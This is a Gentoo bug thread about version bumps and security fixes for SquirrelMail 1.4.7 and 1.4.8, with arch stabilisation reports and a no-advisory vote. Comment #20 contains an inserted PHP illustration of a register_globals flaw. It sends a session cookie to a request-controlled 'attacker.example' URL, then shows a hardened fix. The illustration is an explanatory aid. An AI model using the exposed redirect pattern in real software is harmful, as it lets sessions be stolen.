Bug#: 139273
Status: RESOLVED
Resolution: FIXED
Assigned To: Gentoo Security <security@gentoo.org>
Reporter: Dan Foster <dsf@globalcrossing.net>

Filename Description Type Creator Created Size Actions
sqm.patch Squirrelmail 1.4.6-r3 to 1.4.7 ebuild diff patch Dan Foster 2006-07-12 22:52 0000 335 bytes Details | Diff
emerge.info emerge --info text/plain Michael Weyershäuser 2006-08-12 10:28 0000 2.44 KB Details




Description:   Opened: 2006-07-05 01:23 0000
1.4.7 was released yesterday. 1.4.6-r3 is the current stable version in
Portage.

It includes a minor security fix, and contains mostly minor bug fixes. No API
changes or any major changes were made.

The ChangeLog is at:

http://www.squirrelmail.org/changelog.php

Version bump is requested. Thanks!

------- Comment #1 From Jakub Moc (RETIRED) 2006-07-05 02:07:37 0000 -------
> It includes a minor security fix

Already patched (Bug 135921), no job for security here.

------- Comment #2 From Dan Foster 2006-07-12 22:52:59 0000 -------
Created an attachment (id=91615)
Squirrelmail 1.4.6-r3 to 1.4.7 ebuild diff

The epatch lines in the .ebuild were deleted because 1.4.7 integrates the security
fix entirely.

No other changes required, as no plugins were obsoleted when going from 1.4.6
to 1.4.7. No other functionality changes, either, as this is a minor,
incremental bug fix release.

Tested in local portage overlay repository by copying 1.4.6-r3 ebuild to 1.4.7,
applying the proposed ebuild patch, running ebuild digest on the ebuild, then a
normal emerge subversion.

It worked correctly post-installation as well.

------- Comment #3 From Daniel Webert 2006-08-09 12:42:29 0000 -------
ping - 1.4.7 has not just the backported security fix, there are also some
other features/fixes ... please bump

------- Comment #4 From Stefan Cornelius (RETIRED) 2006-08-09 14:42:24 0000 -------
indeed, please bump

------- Comment #5 From Tuan Van (RETIRED) 2006-08-09 17:30:28 0000 -------
I committed 1.4.7 on behalf of net-mail team as eradicator has been MIA.

Thanks,
Tuan

------- Comment #6 From Stefan Cornelius (RETIRED) 2006-08-09 23:14:50 0000 -------
arches, please test and stable 1.4.7, thank you

------- Comment #7 From Sune Kloppenborg Jeppesen 2006-08-10 01:33:36 0000 -------
@jakub: It appears that we didn't fix the following issue mentioned in the
changelog:

  - Security: Possible cookie theft in src/redirect.php if
    register_globals is enabled, and malicious site is running
    in same domain.

------- Comment #8 From Joshua Jackson 2006-08-10 21:43:46 0000 -------
1.4.7 ate my mail ;) I didn't want it anyways on x86 ^.^;;

------- Comment #9 From Markus Rothe 2006-08-11 06:08:15 0000 -------
ppc64 stable

------- Comment #10 From Stefan Cornelius (RETIRED) 2006-08-11 07:38:42 0000 -------
1.4.8 was released, including yet another security fix. Tuan, could you do some
bumping magic again?

------- Comment #11 From Tuan Van (RETIRED) 2006-08-11 09:21:52 0000 -------
(In reply to comment #10)
> 1.4.8 was released, including yet another security fix. Tuan, could you do some
> bumping magic again?
> 

done. back to you. thanks.

------- Comment #12 From Tobias Scherbaum 2006-08-11 14:09:59 0000 -------
1.4.8 ppc stable

------- Comment #13 From Stefan Cornelius (RETIRED) 2006-08-12 02:45:42 0000 -------
Arches, please test and stable squirrelmail 1.4.8. And let's hope that they don't
issue another patch while we try to get this one stable ;)

------- Comment #14 From Andrej Kacian (RETIRED) 2006-08-12 05:35:48 0000 -------
x86 done

------- Comment #15 From Markus Rothe 2006-08-12 07:16:38 0000 -------
ppc64 stable

------- Comment #16 From Jason Wever (RETIRED) 2006-08-12 09:21:22 0000 -------
As my poppa used to say, the only thing better than one SPARC keyword is five
SPARC keywords.

------- Comment #17 From Michael Weyershäuser 2006-08-12 10:28:22 0000 -------
Created an attachment (id=94071)
emerge --info

working fine on amd64 :)

------- Comment #18 From Thomas Cort (RETIRED) 2006-08-12 10:36:54 0000 -------
amd64 stable.

------- Comment #19 From Thomas Cort (RETIRED) 2006-08-12 20:23:58 0000 -------
alpha stable.

------- Comment #20 From Raphael Marichez 2006-08-16 01:42:14 0000 -------
time to vote

CVE-2006-3665 (fixed in 1.4.7) deals with "register_global=on" and I don't want
to hear about a glsa for this.


 - Security: Make sure that code only sets those variables that are needed in
    compose and are not already set. Thanks James Bercegay from GulfTech for
    pointing this out. [CVE-2006-4019]

I hardly understand the impact.

I vote no-glsa.
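
Both changelog entries quoted in this thread (the src/redirect.php item in comment #7 and the compose item above) concern code that acts on variables it did not set itself. The following is an added illustration, not SquirrelMail's code and not a reproduction of either CVE: it only shows the underlying register_globals mechanism named in comment #7, a script pattern that is exposed by it, and the hardened form (unconditional initialisation, explicit superglobal access, a register_globals check and a redirect-target allow-list). The request data, the cookie name SQMSESSID and the paths are constructed for the example.

```php
<?php
// Added illustration (not SquirrelMail code, not a reproduction of the CVEs):
// how register_globals turns request parameters into script variables, and
// how to write code that does not depend on that.  All request data below is
// constructed so the script runs offline.
declare(strict_types=1);

// Constructed request.  A page on the same domain can control both the query
// string and, via document.cookie, the cookies the browser sends.
$_GET    = ['next' => 'http://attacker.example/steal?c='];
$_COOKIE = ['SQMSESSID' => 'victim-session'];   // cookie name is an assumption

/**
 * Stand-in for register_globals=On (PHP 4 and PHP 5 before 5.4, default
 * variables_order EGPCS): every GET parameter and cookie is imported into the
 * global scope, cookies after GET so a cookie wins on a name clash.  Current
 * PHP has no such setting, which is why this helper emulates it.
 */
function emulate_register_globals(): void {
    foreach ([$_GET, $_COOKIE] as $source) {
        foreach ($source as $name => $value) {
            $GLOBALS[$name] = $value;
        }
    }
}

/**
 * EXPOSED pattern: $next is never assigned here, yet it is used as if it were
 * trusted state.  Under register_globals the request has already defined it,
 * so a same-domain page can pick the redirect target and receive whatever
 * the script appends to it.
 */
function exposed_redirect(): string {
    global $next;
    $session_id = $_COOKIE['SQMSESSID'] ?? '';
    $target = $next ?? '/src/webmail.php';        // attacker-seeded value wins
    return 'Location: ' . $target . '&sid=' . $session_id;
}

/**
 * HARDENED pattern: refuse to run with register_globals on, initialise every
 * local unconditionally (so a pre-seeded global cannot survive), read input
 * only from the superglobal it is expected in, and accept only application-
 * relative redirect targets.  The session id never leaves the cookie.
 */
function hardened_redirect(): string {
    // ini_get() returns false when the setting no longer exists (PHP >= 5.4).
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('refusing to run with register_globals=On');
    }
    $next      = '/src/webmail.php';               // always set, never inherited
    $candidate = $_GET['next'] ?? '';              // explicit source

    // Allow only a single absolute path inside this application: no scheme,
    // no host, no protocol-relative "//" prefix.
    if (preg_match('#\A/[A-Za-z0-9_./?=&%-]*\z#', $candidate)
        && strpos($candidate, '//') === false) {
        $next = $candidate;
    }
    return 'Location: ' . $next;
}

emulate_register_globals();
echo exposed_redirect(), PHP_EOL;   // redirect target chosen by the request, session id appended
echo hardened_redirect(), PHP_EOL;  // external target rejected, default path used
```

Run with `php example.php`. The first line shows the cookie-derived value being sent to the request-controlled target; the second falls back to the default path because the candidate carries a scheme. The `ini_get('register_globals')` check only matters on the old interpreters the thread is about; on current PHP it is always false, and the unconditional initialisation of `$next` is what actually removes the dependency on inherited globals.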

------- Comment #21 From Sune Kloppenborg Jeppesen 2006-08-19 09:03:31 0000 -------
Voting a full NO and closing.

Feel free to reopen if you disagree.

------- Comment #22 From Jeremy Huddleston (RETIRED) 2007-05-21 17:17:14 0000 -------
This was marked as closed but was never fixed for ~arch.  1.5.1-r4 contains the
fix.
